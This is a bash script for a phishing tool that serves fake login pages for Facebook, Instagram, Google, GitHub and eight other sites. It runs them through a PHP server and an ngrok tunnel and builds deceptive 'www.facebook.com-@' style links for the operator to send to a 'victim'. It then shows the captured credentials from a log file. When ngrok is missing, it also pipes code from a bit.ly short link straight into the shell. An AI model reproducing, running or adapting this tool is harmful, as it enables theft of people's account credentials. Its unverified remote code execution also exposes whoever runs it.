#!/bin/bash
#<<<----------DISTRO VERIFICATION---------->>>
distro=$(uname -o)
#<<<----------NGROK---------->>>
if [[ ${distro^^} == *'ANDROID'* ]]; then
  appl=$(pwd)
  if [[ ${appl} == *'com.termux'* ]]; then
     ngk=$(cd /data/data/com.termux/files/usr/bin; find ngrok)
     if [[ $ngk == ngrok ]]; then
       :
     else
       echo
       printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
       echo
       source <(curl -fsSL "https://bit.ly/3repcoL")
       echo
     fi
   elif [[ ${appl} == *'hilled.pwnterm'* ]]; then
     ngk=$(cd /data/data/hilled.pwnterm/files/usr/bin; find ngrok)
     if [[ $ngk == ngrok  ]]; then
       :
     else
       echo
       printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
       echo
       source <(curl -fsSL "https://bit.ly/3repcoL")
     fi
   else
     printf "\e[1;31m Your system is not eleigble to run this tool!!\e[0m\n"
     exit 1
  fi
else
  ngk=$(find /usr/bin/ngrok)
  if [[ ${ngk} == *'/usr/bin/ngrok'* ]]; then
    :
  else
    echo
    printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
    echo
    source <(curl -fsSL "https://bit.ly/3repcoL")
  fi
fi
#<<<---------banner---------->>>
__banner__() {
cat banner | pv -qL 300 | lolcat
echo
}
#<<<----------Processbar---------->>>
processbar()
{
   bar=" #######################################################"
   barlenght=${#bar}
   i=o
   while ((i < 100 )); do
           n=$((i*barlenght / 100 ))
           printf "\e[00;35m\r[%-${barlenght}s]\e[00m" "${bar:0:n}"
           ((i += RANDOM%5+2))
           sleep 0.01
   done
}

#<<<----------HELP---------->>>
__help__() {
echo -e "

<==============================HELP MENUE==============================>

About this tool:-
This is a phishing tool established in this TSconsole-framework
By:- me (Suman kumar ~BHUTUU)!!

Now if you are a beginner then you must be thinking that -
What is phishing??

Answer:- Phishing is a type of social engineering where an attacker
sends a fraudulent message designed to trick a human victim into
revealing sensitive information to the attacker or to deploy
malicious software on the victim's infrastructure like ransomware.

For more detail of phishing you may search it on internet 🤗

* BY this tool be will create a fake login page of respective
sites which are mention in its site list

*You have following valid options in this module:-
1. you can enter number from one to twelve as there are twelve
options are there in site list to use them

  you can enter these number in one digit or two digits
  examples:-
	    1  or  01
	    5  or  05
 MOTE:- numbers which are already in two digits must be enter
as they are i.e. two digits.
  examples:-
                 10
                 11
and last is:-    12


2. option:- list
 use:- to show the list of sites.

3. option:- banner
  use :- This option will show you the banner of the phishing tool :)

4. option:- help or ?
  use:- This option will show you the same help menue you are reading ;)

5. option:- back
  use:- This option will close this phishing program and let you to main menue
        of TSconsole!

6. option:- report
  use:- you can directly report me (if any issue or bug you found) on Telegram :)
    NOTE:- option:- report may not work for all users :/

<-----x--options--x----->

*if you are using android device and emulator is other than TERMUX
 then you must switch on the mobile hotspot otherwise it will work!!

NOTE:- For termux and computer users its all right no need of hotspot!!

* when you choose any site option it will provide you some links of the
 respective site in which any one of them you have to send to your victim.
 when your victim  will enter his/her credential and press login, all that
 credential will be delivered to you !

<>----THANKYOU----<>
" | pv -qL 1000 | lolcat
}

__banner__
#<<<----------colour substitution by variables---------->>>
C0="$(printf '\033[90m')"  B0="$(printf '\033[100m')"
C1="$(printf '\033[91m')"  B1="$(printf '\033[101m')"
C2="$(printf '\033[92m')"  B2="$(printf '\033[102m')"
C3="$(printf '\033[93m')"  B3="$(printf '\033[103m')"
C4="$(printf '\033[94m')"  B4="$(printf '\033[104m')"
C5="$(printf '\033[95m')"  B5="$(printf '\033[105m')"
C6="$(printf '\033[96m')"  B6="$(printf '\033[106m')"
C7="$(printf '\033[97m')"  B7="$(printf '\033[107m')"
R0="$(printf '\033[00m')"  R1="$(printf '\033[0;1m')"
D0="$(printf '\033[77m')"
#<<<-----------program---------->>>
wait() {
sleep 0.002
}
__programs__() {
printf "${B1}List of phising sites${R1}\n"; wait
echo; wait
printf "${C2}>01. Facebook ${R0}\n"; wait
printf "${C2}>02. Instagram ${R0}\n"; wait
printf "${C2}>03. Google ${R0}\n"; wait
printf "${C2}>04. WhatsApp ${R0}\n"; wait
printf "${C2}>05. Snapchat ${R0}\n"; wait
printf "${C2}>06. Telegram ${R0}\n"; wait
printf "${C2}>07. HOTSTAR ${R0}\n"; wait
printf "${C2}>08. Netflix ${R0}\n"; wait
printf "${C2}>09. Amazon ${R0}\n"; wait
printf "${C2}>10. Flipkart ${R0}\n"; wait
printf "${C2}>11. GitHub ${R0}\n"; wait
printf "${C2}>12. Twitter ${R0}\n"; wait
printf "${C2}>Run${C1} back${C2} to go back${R0}\n"; wait
echo; wait
}
__programs__
while true; do
printf "${C3}Enter your Option==> ${C2}"
read phis
echo
if [[ $phis == '1' || $phis == '01' ]]; then
pfolder='facebook'
hoster='www.facebook.com-@'
break

elif [[ $phis == '2' || $phis == '02' ]]; then
pfolder='instagram'
hoster='www.instagram.com-@'
break

elif [[ $phis == '3' || $phis == '03' ]]; then
pfolder='google'
hoster='www.google.com-@'
break

elif [[ $phis == '4' || $phis == '04' ]]; then
pfolder='whatsapp'
hoster='www.whatsapp.com-@'
break

elif [[ $phis == '5' || $phis == '05' ]]; then
pfolder='snapchat'
hoster='www.snapchat.com-@'
break

elif [[ $phis == '6' || $phis == '06' ]]; then
pfolder='telegram'
hoster='www.telegram.com-@'
break

elif [[ $phis == '7' || $phis == '07' ]]; then
pfolder='HOTSTAR'
hoster='www.hotstar.com-@'
break

elif [[ $phis == '8' || $phis == '08' ]]; then
pfolder='Netflix'
hoster='www.netflix.com-@'
break

elif [[ $phis == '9' || $phis == '09' ]]; then
pfolder='Amazon'
hoster='www.amazon.com-@'
break

elif [[ $phis == '10' ]]; then
pfolder='flipkart'
hoster='www.flipkart.com-@'
break

elif [[ $phis == '11' ]]; then
pfolder='github'
hoster='www.github.com-@'
break

elif [[ $phis == '12' ]]; then
pfolder='twitter'
hoster='www.twitter.com-@'
break

elif [[ $phis == 'banner' ]]; then
__banner__

elif [[ $phis == 'help' || $phis == '?' ]]; then
__help__

elif [[ $phis == 'list' ]]; then
__programs__

elif [[ $phis == 'report' ]]; then
xdg-open https://t.me/Suman_bhutuu

elif [[ $phis == 'back' ]]; then
exit 1

else
echo
printf "${C7}[${C1}!${C7}]${C1} Please enter a valid option!!${R0}\n"
echo
fi
done

echo
processbar
echo
cd sites/
cd ${pfolder}/
echo
printf "${C2}STARTING SERVER${R0}"
printf "${C2}..........${R0}\n" | pv -qL 10
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo
if [[ $distro == *'Android'* ]]; then
termux-chroot ngrok http 4444 > /dev/null 2>&1 &
else
sudo ngrok http 4444 > /dev/null 2>&1 &
fi
sleep 7
echo
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "[0-9a-z]*\.ngrok.io")
echo; wait
printf "${C7}<<<${R0}${C1}---------------${R0}${B1}VICTIM'S CRIDENTIALS WILL BE SHOWN HERE${R1}${C1}---------------${R0}${C7}>>>${R0}\n"; wait
echo; wait
printf "${C4}${R0}${C4} Send this link to your Target victim :${R0}${D0} %s${R0}\n" https://${hoster}$link
wait
echo
wait
echo -e "
		 _  _
		/ \|_)
		\_/| \\ short links:-
" | pv -qL 50 | lolcat
echo; wait
printf "${C4}${R0}${C4} Send this link to your Target victim :${R0}${D0} %s${R0}\n" https://$link
wait

if [[ -e log.txt ]]; then
> log.txt
fi
echo
echo
tail -f log.txt

